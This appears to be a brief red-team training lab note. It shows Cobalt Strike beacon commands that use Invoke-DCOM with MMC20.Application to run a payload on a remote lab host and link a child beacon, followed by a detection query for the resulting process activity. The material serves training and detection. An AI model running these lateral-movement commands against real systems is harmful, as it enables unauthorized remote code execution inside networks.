Example from RTO
beacon> powershell-import C:\Tools\Invoke-DCOM.ps1
beacon> powershell Invoke-DCOM -ComputerName web.dev.cyberbotic.io -Method MMC20.Application -Command C:\Windows\smb_x64.exe
Completed
beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
[+] established link to child beacon: 10.10.122.30To identify this lateral movement: event.category: process and event.type : start and process.parent.name: mmc.exe. Also look out for processes whose parent is svchost.exe ... -k DcomLaunch ...